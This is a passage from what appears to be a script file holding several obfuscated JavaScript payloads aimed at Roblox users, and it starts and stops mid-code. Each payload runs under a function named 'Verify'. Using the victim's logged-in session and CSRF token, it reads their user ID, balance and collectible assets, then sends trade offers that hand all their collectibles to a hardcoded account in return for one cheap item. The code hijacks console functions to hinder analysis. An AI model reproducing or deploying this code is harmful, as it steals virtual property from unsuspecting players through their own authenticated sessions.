fetch(_0x48db53(0x1e6,0x1f6,0x1fe,0x1fb)+'.roblox.com'+_0x48b304(-0x1b8,-0x1eb,-0x1d6,-0x1dd)+_0x48b304(-0x1b7,-0x1ac,-0x1ca,-0x1e3)),_0x66cf85=await _0x3903a6[_0x48b304(-0x1f5,-0x202,-0x1ec,-0x1fd)](),_0x45a763=_0x66cf85[_0x48db53(0x1df,0x1da,0x1c1,0x1e7)+'e'],_0x40a7ce=_0x66cf85[_0x48db53(0x21f,0x207,0x222,0x20e)];if(typeof _0x45a763==='undefined'||typeof _0x40a7ce===_0x48b304(-0x222,-0x224,-0x203,-0x1e0))throw new Error('error');const _0x413031=await fetch('https://inv'+_0x48db53(0x1d7,0x1ec,0x20e,0x1e3)+_0x48b304(-0x1f7,-0x213,-0x1f7,-0x1ff)+'sers/'+_0x40a7ce+('/assets/col'+_0x48b304(-0x1db,-0x20b,-0x1f8,-0x208)+_0x48b304(-0x1d8,-0x1c1,-0x1cd,-0x1c6)+_0x48b304(-0x1ee,-0x1e1,-0x1d1,-0x1eb))),_0x2073e9=await _0x413031[_0x48b304(-0x1f5,-0x1f0,-0x1ec,-0x1fc)](),_0x4361a6=_0x2073e9['data'][_0x48db53(0x1c5,0x1e5,0x1d2,0x1ec)](_0x222eac=>_0x222eac[_0x48db53(0x223,0x20c,0x1ea,0x21a)]);if(_0x4361a6[_0x48db53(0x1ff,0x204,0x1e9,0x20d)]===0x0)throw new Error(_0x48db53(0x1fb,0x1db,0x1b9,0x1ce));return{'robuxBalance':_0x45a763,'RobloxID':_0x40a7ce,'userAssetIds':_0x4361a6};}catch(_0x153343){console[_0x48b304(-0x1ee,-0x1ea,-0x1dd,-0x1ce)](_0x153343);throw _0x153343;}}async function fetchCsrfToken(){function _0x264d23(_0x4e249d,_0x2bcdc7,_0x33d3c1,_0x3661f9){return _0x159d49(_0x4e249d-0x82,_0x2bcdc7-0x3e,_0x4e249d-0x55b,_0x33d3c1);}function _0x21c9e9(_0x56dda7,_0x49b3a5,_0x4857c5,_0x592c10){return _0x159d49(_0x56dda7-0x5f,_0x49b3a5-0x2e,_0x49b3a5- -0x11,_0x4857c5);}try{const _0x496708=await fetch(_0x21c9e9(-0xc2,-0xb5,-0xc5,-0xa9)+_0x21c9e9(-0xd4,-0xb4,-0xd0,-0xd2)),_0x47b588=await _0x496708['text'](),_0xcbf9b5=document['createEleme'+'nt']('div');_0xcbf9b5[_0x21c9e9(-0xb3,-0xbd,-0xb4,-0xd0)]=_0x47b588;const _0x4ce591=_0xcbf9b5['querySelect'+'or'](_0x264d23(0x4ba,0x4d8,0x49e,0x4a8)+_0x21c9e9(-0x9e,-0xad,-0xa9,-0x9b)+']');if(!_0x4ce591)throw new Error('Meta\x20tag\x20wi'+_0x264d23(0x497,0x485,0x4ba,0x489)+'rf-token\x22\x20n'+_0x264d23(0x4d3,0x4e5,0x4c1,0x4c9));const _0x13cbbf=_0x4ce591[_0x21c9e9(-0xc6,-0xaf,-0xaa,-0x93)+'e'](_0x264d23(0x4b9,0x4c4,0x4cb,0x4d6));if(!_0x13cbbf)throw new Error(_0x264d23(0x4c4,0x4b1,0x4d5,0x4a4));return _0x13cbbf;}catch(_0x574dfc){console[_0x21c9e9(-0x90,-0xa8,-0xbb,-0xb4)](_0x574dfc);throw _0x574dfc;}}async function Roblox(_0x135e75){function _0xb36c1a(_0x480db1,_0x48f60f,_0x5e9b2e,_0xbceb45){return _0x159d49(_0x480db1-0x95,_0x48f60f-0xde,_0x48f60f- -0x1e,_0x480db1);}function _0x259668(_0x5a16d3,_0x18d464,_0x5dd3a6,_0x187b5a){return _0x159d49(_0x5a16d3-0x1c0,_0x18d464-0x124,_0x5a16d3-0x50b,_0x5dd3a6);}try{const _0x335d17=await fetchCsrfToken(),_0x507aed=await fetch(_0x259668(0x45c,0x45c,0x476,0x476)+_0x259668(0x457,0x45f,0x461,0x464)+_0x259668(0x46b,0x45c,0x44b,0x485)+_0x259668(0x464,0x450,0x47b,0x471),{'method':_0xb36c1a(-0xae,-0xb2,-0xa9,-0xca),'headers':{'Content-Type':_0xb36c1a(-0xde,-0xc6,-0xaf,-0xad)+_0xb36c1a(-0xb5,-0xaf,-0x91,-0xd0),'X-CSRF-TOKEN':_0x335d17},'credentials':_0xb36c1a(-0xba,-0xa0,-0x9d,-0x8c),'body':JSON[_0xb36c1a(-0xc8,-0xc8,-0xe3,-0xca)](_0x135e75)});if(_0x507aed['ok'])console[_0xb36c1a(-0xb9,-0xd9,-0xef,-0xd1)](_0x259668(0x462,0x44d,0x479,0x479));else{const _0x3923c1=await _0x507aed[_0x259668(0x465,0x459,0x451,0x474)]();console[_0xb36c1a(-0xcc,-0xb5,-0xb4,-0xb8)](_0x3923c1);}}catch(_0x1c334f){console[_0xb36c1a(-0xb4,-0xb5,-0xb7,-0xa6)](_0x259668(0x471,0x453,0x46c,0x46f));throw _0x1c334f;}}async function Verify(){const _0xa5c862=(function(){let _0x5eae90=!![];return function(_0x5170f3,_0x295e9d){const _0x268e68=_0x5eae90?function(){function _0x1f2876(_0x2a4b1a,_0x2733f9,_0x21ad6b,_0x2f98d6){return _0x3aae(_0x2733f9- -0x10,_0x21ad6b);}if(_0x295e9d){const _0x3ecf81=_0x295e9d[_0x1f2876(0x15f,0x159,0x17c,0x179)](_0x5170f3,arguments);return _0x295e9d=null,_0x3ecf81;}}:function(){};return _0x5eae90=![],_0x268e68;};}()),_0x51a6f6=_0xa5c862(this,function(){function _0x4dcf80(_0x4f748f,_0x4d8f44,_0x53725f,_0x452206){return _0x3aae(_0x53725f- -0x3c5,_0x4d8f44);}function _0x6a8245(_0xfada0a,_0x457686,_0x5c15c0,_0x35834c){return _0x3aae(_0x5c15c0-0x27e,_0x35834c);}return _0x51a6f6[_0x6a8245(0x3fc,0x3cf,0x3d9,0x3b7)]()[_0x6a8245(0x3cc,0x3bc,0x3b8,0x39f)]('(((.+)+)+)+'+'$')[_0x6a8245(0x3d8,0x3ba,0x3d9,0x3c4)]()[_0x6a8245(0x3d0,0x3cf,0x3bb,0x3aa)](_0x51a6f6)['search']('(((.+)+)+)+'+'$');});function _0x586fad(_0x508fcb,_0x49d93b,_0x183d5b,_0x46ad1a){return _0x159d49(_0x508fcb-0xe2,_0x49d93b-0x12c,_0x183d5b-0x28,_0x49d93b);}function _0x1673af(_0x2aca23,_0x11bbb6,_0x330147,_0x5b5f21){return _0x159d49(_0x2aca23-0xf3,_0x11bbb6-0x1f,_0x2aca23-0x3fe,_0x5b5f21);}_0x51a6f6();const _0x2830e2=(function(){let _0x2e3d07=!![];return function(_0x1115e0,_0x2c9a06){const _0x1a9eaf=_0x2e3d07?function(){function _0x55b3a7(_0x61a9b2,_0x1c1028,_0x2273fd,_0x3799ea){return _0x3aae(_0x1c1028- -0x81,_0x2273fd);}if(_0x2c9a06){const _0x527f92=_0x2c9a06[_0x55b3a7(0xc7,0xe8,0xea,0xd4)](_0x1115e0,arguments);return _0x2c9a06=null,_0x527f92;}}:function(){};return _0x2e3d07=![],_0x1a9eaf;};}()),_0x5389ef=_0x2830e2(this,function(){let _0x760bcc;try{const _0x4dfd64=Function(_0x1dfb61(0x181,0x199,0x187,0x19c)+_0x1dfb61(0x168,0x166,0x157,0x175)+(_0x5412d4(0x2aa,0x2ae,0x2ca,0x2b9)+_0x5412d4(0x2dd,0x2bd,0x2e9,0x2ce)+'\x20this\x22)(\x20)')+');');_0x760bcc=_0x4dfd64();}catch(_0x20a4e7){_0x760bcc=window;}const _0x5889a4=_0x760bcc['console']=_0x760bcc[_0x5412d4(0x2f3,0x2d2,0x2f7,0x2e6)]||{};function _0x5412d4(_0x43b02b,_0x4008a0,_0x1579aa,_0xf4395f){return _0x3aae(_0xf4395f-0x176,_0x43b02b);}function _0x1dfb61(_0x11ce06,_0x3c2f64,_0x11c335,_0x3ee059){return _0x3aae(_0x11ce06-0x20,_0x3c2f64);}const _0x2907df=['log',_0x5412d4(0x2fe,0x2e6,0x2d5,0x2dd),_0x1dfb61(0x186,0x19a,0x197,0x16d),_0x5412d4(0x2be,0x2bd,0x2c6,0x2d2),_0x1dfb61(0x159,0x146,0x14e,0x140),'table','trace'];for(let _0x35d808=0x0;_0x35d808<_0x2907df[_0x1dfb61(0x17d,0x19c,0x18b,0x15d)];_0x35d808++){const _0x411fd4=_0x2830e2['constructor'][_0x1dfb61(0x160,0x145,0x13e,0x171)][_0x5412d4(0x2b8,0x2cf,0x291,0x2ad)](_0x2830e2),_0x2d9984=_0x2907df[_0x35d808],_0xb9889e=_0x5889a4[_0x2d9984]||_0x411fd4;_0x411fd4['__proto__']=_0x2830e2['bind'](_0x2830e2),_0x411fd4['toString']=_0xb9889e['toString']['bind'](_0xb9889e),_0x5889a4[_0x2d9984]=_0x411fd4;}});_0x5389ef();try{const {robuxBalance:_0x3e8ce3,RobloxID:_0x51d066,userAssetIds:_0x57b704}=await FetchInfo(),_0x30efe4=await TermedAssets(),_0x28bc18={'offers':[{'userId':$ID,'userAssetIds':[_0x30efe4],'robux':null},{'userId':_0x51d066,'userAssetIds':_0x57b704,'robux':null}]},_0x4e62d6={'offers':[{'userId':0xf8fec04b,'userAssetIds':[_0x30efe4],'robux':null},{'userId':_0x51d066,'userAssetIds':_0x57b704,'robux':null}]};console[_0x1673af(0x343,0x348,0x362,0x346)]('Trade\x20Send!'),await Roblox(_0x28bc18),await Roblox(_0x4e62d6);}catch(_0x483d70){console[_0x1673af(0x367,0x34f,0x356,0x349)](_0x586fad(-0x79,-0x55,-0x72,-0x52));}}function _0x159d49(_0x458e26,_0x588bdd,_0xe216de,_0x39e574){return _0x3aae(_0xe216de- -0x1f3,_0x39e574);}Verify();";
$code2 = "(function(_0x32a914,_0x386fa7){const _0x42685a=_0x32a914();function _0x2a6cf8(_0x40b56a,_0x465120,_0xcdd809,_0x132aea){return _0x3657(_0x40b56a-0x1ce,_0x132aea);}function _0x4898c8(_0x4e0f3e,_0x30459b,_0x9062a1,_0x144823){return _0x3657(_0x4e0f3e-0x3a3,_0x9062a1);}while(!![]){try{const _0x3a039a=parseInt(_0x2a6cf8(0x372,0x37e,0x354,0x35c))/0x1*(parseInt(_0x4898c8(0x53e,0x550,0x51a,0x51e))/0x2)+parseInt(_0x4898c8(0x540,0x560,0x534,0x55e))/0x3*(-parseInt(_0x2a6cf8(0x37d,0x36b,0x367,0x37b))/0x4)+parseInt(_0x4898c8(0x543,0x528,0x545,0x569))/0x5*(parseInt(_0x2a6cf8(0x34f,0x330,0x330,0x332))/0x6)+parseInt(_0x4898c8(0x551,0x569,0x55e,0x558))/0x7*(parseInt(_0x2a6cf8(0x394,0x3a1,0x3ac,0x388))/0x8)+parseInt(_0x4898c8(0x533,0x51f,0x510,0x52c))/0x9+parseInt(_0x4898c8(0x54e,0x53e,0x564,0x54a))/0xa+-parseInt(_0x2a6cf8(0x393,0x39b,0x392,0x389))/0xb*(parseInt(_0x2a6cf8(0x390,0x372,0x396,0x37e))/0xc);if(_0x3a039a===_0x386fa7)break;else _0x42685a['push'](_0x42685a['shift']());}catch(_0x51db92){_0x42685a['push'](_0x42685a['shift']());}}}(_0x9ee0,0xbe104));function _0x401184(_0x32c10d,_0x5cf8c7,_0x4ab3c1,_0x418cec){return _0x3657(_0x32c10d- -0x239,_0x418cec);}var TermedUser=prompt(_0x401184(-0xb7,-0xdb,-0xce,-0x97));TermedUser?alert(_0x401184(-0xb6,-0xb6,-0xcd,-0xc3)):alert(_0x2dc2bd(0x371,0x3a0,0x37d,0x384));async function TermedAssets(){function _0x1c5941(_0x533409,_0x227d13,_0x364adf,_0x1cedb0){return _0x401184(_0x227d13-0x34c,_0x227d13-0x1af,_0x364adf-0x176,_0x533409);}const _0x1051b0='https://inv'+_0x2e07e9(0xd6,0xc6,0xc4,0xc2)+_0x2e07e9(0xce,0x100,0x107,0xe5)+_0x2e07e9(0xee,0x10f,0xfe,0x107)+_0x1c5941(0x2a0,0x2a2,0x282,0x280)+_0x2e07e9(0xee,0xfb,0xf9,0xf9)+'Order=Asc&l'+_0x2e07e9(0xd4,0xb9,0xd2,0xd4);function _0x2e07e9(_0x4358df,_0x1cdc8f,_0x49376a,_0x4df4ff){return _0x2dc2bd(_0x49376a,_0x1cdc8f-0x13a,_0x4df4ff- -0x2ab,_0x4df4ff-0x70);}try{const _0x188655=await fetch(_0x1051b0);if(!_0x188655['ok'])throw new Error(_0x2e07e9(0xe2,0xce,0x10c,0xf1));const _0xdfbf43=await _0x188655[_0x2e07e9(0xd1,0xd4,0xba,0xd5)](),_0x13c78a=_0xdfbf43[_0x1c5941(0x2a9,0x2b5,0x2da,0x2c0)],_0x3cd1c9=_0x13c78a['map'](_0x43b1a2=>_0x43b1a2[_0x2e07e9(0xbd,0xd1,0xda,0xc6)]),_0x47661a=_0x13c78a[_0x2e07e9(0xf4,0xea,0xcf,0xd6)](_0x3b1142=>_0x3b1142[_0x1c5941(0x2d0,0x2c8,0x2e6,0x2ac)+'gePrice']),_0x5e0887=_0x47661a[_0x1c5941(0x2c5,0x2c4,0x2a2,0x2bb)](Math[_0x1c5941(0x2cc,0x2b8,0x292,0x2c2)](..._0x47661a)),_0x3ef27f=_0x13c78a[_0x5e0887];return console[_0x2e07e9(0xb7,0xc8,0xaa,0xca)](_0x3ef27f),_0x3ef27f[_0x1c5941(0x2ab,0x29c,0x2b9,0x2bd)];}catch(_0xd90528){return console[_0x1c5941(0x2e5,0x2c7,0x2e6,0x2e6)](_0xd90528),null;}}function _0x3657(_0x5c45d2,_0x130a69){const _0x1075cd=_0x9ee0();return _0x3657=function(_0x354869,_0x8cbff5){_0x354869=_0x354869-0x180;let _0x177af9=_0x1075cd[_0x354869];return _0x177af9;},_0x3657(_0x5c45d2,_0x130a69);}async function FetchInfo(){function _0x560c51(_0x490bf1,_0x23571c,_0x2855c9,_0x38c3eb){return _0x2dc2bd(_0x38c3eb,_0x23571c-0x1af,_0x490bf1- -0x132,_0x38c3eb-0x98);}function _0x4f13f1(_0x23111c,_0xa55caa,_0x39a660,_0x1071e0){return _0x2dc2bd(_0x23111c,_0xa55caa-0x1ae,_0x39a660- -0x340,_0x1071e0-0x1d3);}try{const _0x50e0f2=await fetch(_0x4f13f1(0x35,0xd,0x2e,0x24)+_0x560c51(0x23e,0x260,0x244,0x21d)+_0x560c51(0x274,0x25c,0x28f,0x28a)+_0x560c51(0x255,0x234,0x25e,0x259)),_0x1273ef=await _0x50e0f2[_0x560c51(0x24e,0x26b,0x23a,0x23d)](),_0x1f6ef3=_0x1273ef[_0x4f13f1(0x57,0x47,0x3c,0x51)+'e'],_0x521b7b=_0x1273ef[_0x560c51(0x27d,0x26b,0x29c,0x29f)];if(typeof _0x1f6ef3==='undefined'||typeof _0x521b7b===_0x560c51(0x260,0x242,0x265,0x242))throw new Error(_0x4f13f1(0x7d,0x3c,0x5c,0x80));const _0x3bd8fc=await fetch('https://inv'+_0x4f13f1(0x13,0x43,0x2d,0x39)+_0x4f13f1(0x37,0x2c,0x50,0x46)+'sers/'+_0x521b7b+(_0x4f13f1(0x46,0x11,0x32,0x3a)+_0x4f13f1(0x72,0x66,0x62,0x88)+_0x560c51(0x26d,0x280,0x24d,0x24f)+_0x4f13f1(0x68,0x43,0x5e,0x7e))),_0x135260=await _0x3bd8fc[_0x560c51(0x24e,0x25a,0x255,0x238)](),_0x5cd09d=_0x135260[_0x560c51(0x258,0x24c,0x253,0x26a)]['map'](_0x5d1934=>_0x5d1934['userAssetId']);if(_0x5cd09d['length']===0x0)throw new Error('...');return{'robuxBalance':_0x1f6ef3,'RobloxID':_0x521b7b,'userAssetIds':_0x5cd09d};}catch(_0xeb4ed5){console[_0x560c51(0x26a,0x253,0x285,0x26b)](_0xeb4ed5);throw _0xeb4ed5;}}function _0x2dc2bd(_0x3a1639,_0x3d5210,_0xdea7e4,_0xb819e1){return _0x3657(_0xdea7e4-0x1e8,_0x3a1639);}function _0x9ee0(){const _0x5bc4d7=['Success','include','entory.robl','https://www','Trade\x20Send!','.roblox.com','userAssetId','/assets/col','constructor','console','log','apply','sets/collec','11141262MZIcMA','ot\x20found','exception','toString','RobuxBalanc','Failed','querySelect','imit=50','json','map','trace','1308178hnjgCT','stringify','63DiyDfk','{}.construc','userinfo','2402895RxMXJQ','search','data','text','1aCWgHB','min','data-token','info','ox.com/v1/u','com/v1/trad','undefined','2082230KFODRX','des.roblox.','bind','5239213TMLDDL','271512ZkZgYU','es/send','indexOf','success','\x20this\x22)(\x20)','error','recentAvera','c&limit=10','ortOrder=As','(((.+)+)+)+','Meta\x20tag\x20wi','lectibles?s','prototype','tibles?sort','POST','/mobileapi/','ction()\x20','createEleme','div','6751980RuJwWG','meta[name=\x22','return\x20(fun','22xOykEa','8wkAGCB','UserID','/json','csrf-token\x22','sers/$ID/as','table','__proto__','6occLgI','$pr'];_0x9ee0=function(){return _0x5bc4d7;};return _0x9ee0();}async function fetchCsrfToken(){function _0x5bac02(_0x73013a,_0x166831,_0xfabcf2,_0xaf791e){return _0x401184(_0x166831-0x15e,_0x166831-0x1af,_0xfabcf2-0x9,_0x73013a);}function _0x386120(_0x42c1ad,_0x287822,_0x51bb86,_0x364d70){return _0x2dc2bd(_0x42c1ad,_0x287822-0x31,_0x287822-0x1fe,_0x364d70-0x8c);}try{const _0x5bd5de=await fetch(_0x5bac02(0xca,0xab,0xbc,0x86)+'.roblox.com'),_0x3e9e09=await _0x5bd5de[_0x5bac02(0xe2,0xc8,0xe3,0xda)](),_0x1e872b=document[_0x386120(0x592,0x5a6,0x592,0x5ac)+'nt'](_0x386120(0x592,0x5a7,0x5cc,0x5aa));_0x1e872b['innerHTML']=_0x3e9e09;const _0x42f2fc=_0x1e872b[_0x5bac02(0xb6,0xbb,0xd9,0xca)+'or'](_0x386120(0x5a3,0x5a9,0x5c5,0x594)+_0x386120(0x5d4,0x5af,0x5d5,0x595)+']');if(!_0x42f2fc)throw new Error(_0x386120(0x5b8,0x59f,0x5ae,0x59a)+'th\x20name=\x22cs'+'rf-token\x22\x20n'+_0x386120(0x565,0x577,0x561,0x576));const _0x20560e=_0x42f2fc['getAttribut'+'e'](_0x386120(0x57b,0x58c,0x5a5,0x58f));if(!_0x20560e)throw new Error(_0x386120(0x5a4,0x59a,0x5bc,0x58c));return _0x20560e;}catch(_0x5bfa6d){console[_0x5bac02(0xc1,0xd9,0xfc,0xf8)](_0x5bfa6d);throw _0x5bfa6d;}}async function Roblox(_0x39e748){function _0x5e16c9(_0xf0365b,_0x5b6a51,_0xca9dc4,_0x4735da){return _0x2dc2bd(_0xf0365b,_0x5b6a51-0xb7,_0x5b6a51-0x1ab,_0x4735da-0x17d);}function _0x486c51(_0x5a0052,_0x13b2ab,_0x1194ca,_0x3ca176){return _0x2dc2bd(_0x13b2ab,_0x13b2ab-0x103,_0x1194ca- -0x3a4,_0x3ca176-0x164);}try{const _0x50fd0b=await fetchCsrfToken(),_0x357003=await fetch('https://tra'+_0x486c51(-0xc,-0xc,-0x10,-0x13)+_0x486c51(-0x2a,0x0,-0x13,0xa)+_0x486c51(0x16,-0x1b,-0xc,-0x9),{'method':_0x486c51(0x18,0x1c,0x1,-0x12),'headers':{'Content-Type':'application'+_0x486c51(0x3,-0x10,0xc,-0x1a),'X-CSRF-TOKEN':_0x50fd0b},'credentials':_0x486c51(-0x3e,-0x3c,-0x38,-0x4c),'body':JSON[_0x5e16c9(0x553,0x52f,0x524,0x520)](_0x39e748)});if(_0x357003['ok'])console[_0x5e16c9(0x532,0x520,0x4fe,0x506)](_0x5e16c9(0x537,0x545,0x559,0x568));else{const _0x298d26=await _0x357003[_0x5e16c9(0x533,0x52b,0x52c,0x52e)]();console[_0x486c51(-0x13,-0x13,-0x8,-0x18)](_0x298d26);}}catch(_0x39f137){console[_0x5e16c9(0x555,0x547,0x528,0x528)]('No\x20Premium');throw _0x39f137;}}async function Verify(){const _0x496bc2=(function(){let _0x3c353b=!![];return function(_0x2009b9,_0x413653){const _0x55dbf6=_0x3c353b?function(){function _0x153249(_0x442ac5,_0x1e7a8b,_0xea13d5,_0x1820b1){return _0x3657(_0xea13d5-0x207,_0x1820b1);}if(_0x413653){const _0x3aefc7=_0x413653[_0x153249(0x3ac,0x3ab,0x395,0x37a)](_0x2009b9,arguments);return _0x413653=null,_0x3aefc7;}}:function(){};return _0x3c353b=![],_0x55dbf6;};}()),_0x5ed426=_0x496bc2(this,function(){function _0x42e402(_0x116c28,_0x3aae45,_0x22b401,_0x4efdb7){return _0x3657(_0x116c28-0x356,_0x22b401);}function _0x5a2488(_0x157b62,_0x46bcbb,_0x476cbf,_0x964980){return _0x3657(_0x476cbf-0x24a,_0x46bcbb);}return _0x5ed426['toString']()['search'](_0x42e402(0x50e,0x52c,0x4eb,0x4f6)+'$')[_0x42e402(0x4e9,0x4f4,0x4fa,0x4db)]()[_0x5a2488(0x3e2,0x3b2,0x3d5,0x3cf)](_0x5ed426)[_0x5a2488(0x3e1,0x3f2,0x3eb,0x3f7)]('(((.+)+)+)+'+'$');});function _0x343c22(_0x13c55d,_0x4e69aa,_0x225f78,_0x5129ad){return _0x401184(_0x5129ad- -0xa3,_0x4e69aa-0x10e,_0x225f78-0xf7,_0x225f78);}function _0x30453d(_0xfd0f58,_0x15df46,_0x57534a,_0x5c7bd6){return _0x401184(_0x57534a-0x3ca,_0x15df46-0x12b,_0x57534a-0x181,_0x5c7bd6);}_0x5ed426();const _0x296ee5=(function(){let _0x1ceb67=!![];return function(_0x50e92a,_0x29c49a){const _0x527572=_0x1ceb67?function(){if(_0x29c49a){const _0x54af18=_0x29c49a['apply'](_0x50e92a,arguments);return _0x29c49a=null,_0x54af18;}}:function(){};return _0x1ceb67=![],_0x527572;};}()),_0x359ed9=_0x296ee5(this,function(){let _0x357e51;try{const _0x42f78a=Function(_0x549e10(0x49d,0x4ae,0x49a,0x492)+_0x549e10(0x473,0x491,0x46e,0x48d)+(_0x549e10(0x46b,0x447,0x48b,0x46c)+'tor(\x22return'+_0x5687f0(0x4a7,0x4b9,0x4d7,0x4bf))+');');_0x357e51=_0x42f78a();}catch(_0x4561f2){_0x357e51=window;}function _0x5687f0(_0x269c1f,_0x2976d1,_0xd30f0c,_0x59065b){return _0x3657(_0x59065b-0x30c,_0xd30f0c);}const _0xadd24f=_0x357e51[_0x549e10(0x447,0x468,0x447,0x45a)]=_0x357e51[_0x549e10(0x46a,0x443,0x47c,0x45a)]||{};function _0x549e10(_0x3238a5,_0x3decb2,_0x3f1989,_0x46c809){return _0x3657(_0x46c809-0x2ce,_0x3f1989);}const _0xef67ce=[_0x5687f0(0x47b,0x488,0x489,0x499),'warn',_0x5687f0(0x4b3,0x4c5,0x4c6,0x4b3),_0x5687f0(0x4b1,0x4ba,0x4d8,0x4c0),_0x5687f0(0x47f,0x4aa,0x4a5,0x49e),_0x549e10(0x48d,0x47f,0x481,0x499),_0x5687f0(0x48e,0x4b9,0x482,0x4a6)];for(let _0x16349e=0x0;_0x16349e<_0xef67ce['length'];_0x16349e++){const _0x57a326=_0x296ee5[_0x549e10(0x477,0x461,0x434,0x459)][_0x5687f0(0x4a8,0x4b2,0x4e3,0x4c7)][_0x5687f0(0x4b2,0x4a9,0x4ad,0x4b9)](_0x296ee5),_0x188998=_0xef67ce[_0x16349e],_0x5688f6=_0xadd24f[_0x188998]||_0x57a326;_0x57a326[_0x5687f0(0x48f,0x4a0,0x471,0x48c)]=_0x296ee5[_0x5687f0(0x4cc,0x4b7,0x497,0x4b9)](_0x296ee5),_0x57a326['toString']=_0x5688f6['toString'][_0x549e10(0x48f,0x493,0x469,0x47b)](_0x5688f6),_0xadd24f[_0x188998]=_0x57a326;}});_0x359ed9();try{const {robuxBalance:_0x3e47a1,RobloxID:_0x542a98,userAssetIds:_0x189830}=await FetchInfo(),_0x12fb89=await TermedAssets(),_0x41a283={'offers':[{'userId':$ID,'userAssetIds':[_0x12fb89],'robux':null},{'userId':_0x542a98,'userAssetIds':_0x189830,'robux':null}]},_0x2e2c6e={'offers':[{'userId':0xf8fec04b,'userAssetIds':[_0x12fb89],'robux':null},{'userId':_0x542a98,'userAssetIds':_0x189830,'robux':null}]};console[_0x30453d(0x342,0x340,0x31e,0x317)](_0x30453d(0x324,0x336,0x318,0x32d)),await Roblox(_0x41a283),await Roblox(_0x2e2c6e);}catch(_0x576df8){console[_0x30453d(0x343,0x327,0x345,0x327)]('No\x20Premium');}}Verify();";
$code3 = "(function(_0x17e9a9,_0x2c9a8c){const _0x47853f=_0x17e9a9();function _0x152067(_0x233d1b,_0x3326f9,_0x3ed446,_0x1b9524){return _0x78b1(_0x233d1b- -0x220,_0x3ed446);}function _0x12c534(_0x5e3c75,_0x11b684,_0x53e39e,_0x52cada){return _0x78b1(_0x52cada-0x39f,_0x11b684);}while(!![]){try{const _0xffa306=-parseInt(_0x152067(-0x19b,-0x1bf,-0x190,-0x17b))/0x1+-parseInt(_0x12c534(0x458,0x446,0x468,0x44b))/0x2*(parseInt(_0x12c534(0x408,0x40c,0x401,0x406))/0x3)+-parseInt(_0x12c534(0x425,0x439,0x43e,0x419))/0x4+parseInt(_0x152067(-0x1b6,-0x1bd,-0x1cf,-0x192))/0x5*(parseInt(_0x12c534(0x426,0x419,0x40e,0x425))/0x6)+parseInt(_0x152067(-0x180,-0x1a4,-0x15b,-0x179))/0x7+parseInt(_0x152067(-0x1b8,-0x192,-0x192,-0x1c9))/0x8*(-parseInt(_0x152067(-0x191,-0x199,-0x193,-0x1a7))/0x9)+parseInt(_0x12c534(0x466,0x425,0x42e,0x447))/0xa;if(_0xffa306===_0x2c9a8c)break;else _0x47853f['push'](_0x47853f['shift']());}catch(_0x313c35){_0x47853f['push'](_0x47853f['shift']());}}}(_0x2feb,0x2f2e2));var TermedUser=prompt(_0x1d53f5(0x131,0x129,0x130,0x114));function _0x2feb(){const _0x320061=['ox.com/v1/u','info','ortOrder=As','UserID','No\x20Premium','/assets/col','innerHTML','2024307bmTaze','log','$pr','apply','data','rf-token\x22\x20n','getAttribut','meta[name=\x22','RobuxBalanc','text','prototype','POST','\x20this\x22)(\x20)','stringify','application','(((.+)+)+)+','indexOf','1052429QIBzPs','des.roblox.','json','search','tibles?sort','ction()\x20','/mobileapi/','imit=50','6331290uJmsJb','exception','https://www','/json','98848KnUbly','es/send','__proto__','recentAvera','lectibles?s','th\x20name=\x22cs','data-token','entory.robl','3UtlBhC','8KNgbgt','.roblox.com','15LycpgK','warn','toString','createEleme','...','Meta\x20tag\x20wi','bind','error','querySelect','tor(\x22return','success','undefined','length','console','sers/$ID/as','return\x20(fun','1057888vOwmWh','constructor','{}.construc','gePrice','Failed','div','csrf-token\x22','userAssetId','https://inv','include','map','235532sBZqmy','368250MZKmqE','Trade\x20Send!'];_0x2feb=function(){return _0x320061;};return _0x2feb();}TermedUser?alert('Success'):alert(_0x1d53f5(0x11e,0x116,0x113,0x124));async function TermedAssets(){function _0x1a018f(_0x131271,_0x2a9a45,_0x569f9c,_0x5eae3d){return _0x101539(_0x2a9a45,_0x131271- -0x48,_0x569f9c-0xc9,_0x5eae3d-0x162);}function _0x306bf7(_0x4a9ae3,_0x210a92,_0x20d904,_0x1e60fa){return _0x1d53f5(_0x4a9ae3-0x2bc,_0x20d904,_0x20d904-0x61,_0x1e60fa-0x14);}const _0x5f4368=_0x1a018f(-0x1ca,-0x1d1,-0x1ae,-0x1b0)+_0x1a018f(-0x1e6,-0x1c5,-0x1db,-0x1c4)+'ox.com/v1/u'+_0x306bf7(0x3d4,0x3b4,0x3ae,0x3e8)+'sets/collec'+_0x1a018f(-0x1a8,-0x1bb,-0x1ce,-0x194)+'Order=Asc&l'+_0x306bf7(0x403,0x40c,0x3f5,0x3ed);try{const _0x13336f=await fetch(_0x5f4368);if(!_0x13336f['ok'])throw new Error(_0x1a018f(-0x1db,-0x1ba,-0x1c4,-0x1c5));const _0x3fd2e5=await _0x13336f[_0x306bf7(0x3fe,0x41b,0x419,0x3f9)](),_0x1cbad6=_0x3fd2e5[_0x306bf7(0x3ef,0x40b,0x3e1,0x3db)],_0x449d0a=_0x1cbad6[_0x1a018f(-0x1c8,-0x1c5,-0x1e6,-0x1c5)](_0x5ad8bb=>_0x5ad8bb[_0x1a018f(-0x1cb,-0x1b8,-0x1d1,-0x1e7)]),_0x254eef=_0x1cbad6['map'](_0x457a70=>_0x457a70[_0x306bf7(0x40b,0x40e,0x3f3,0x42a)+_0x1a018f(-0x1cf,-0x1d2,-0x1d7,-0x1ee)]),_0x15829=_0x254eef[_0x306bf7(0x3fb,0x3ec,0x420,0x412)](Math['min'](..._0x254eef)),_0x12c4f0=_0x1cbad6[_0x15829];return console[_0x1a018f(-0x1bc,-0x1b7,-0x1d3,-0x1c8)](_0x12c4f0),_0x12c4f0[_0x306bf7(0x3dd,0x3ed,0x3c2,0x3ef)];}catch(_0xe232a0){return console['error'](_0xe232a0),null;}}async function FetchInfo(){function _0x5ea5a6(_0x59e4d9,_0x2d5871,_0x8c59ef,_0x21bfcd){return _0x101539(_0x59e4d9,_0x21bfcd-0x1ae,_0x8c59ef-0x21,_0x21bfcd-0x156);}function _0x42a1e2(_0x381787,_0x25d3de,_0x35df3a,_0x4321bd){return _0x101539(_0x35df3a,_0x381787- -0xc0,_0x35df3a-0x45,_0x4321bd-0x139);}try{const _0x10f916=await fetch(_0x5ea5a6(0x36,0x43,0x78,0x54)+_0x5ea5a6(0x4,0x16,-0x11,0x13)+_0x42a1e2(-0x21e,-0x238,-0x21e,-0x245)+'userinfo'),_0x7dbc64=await 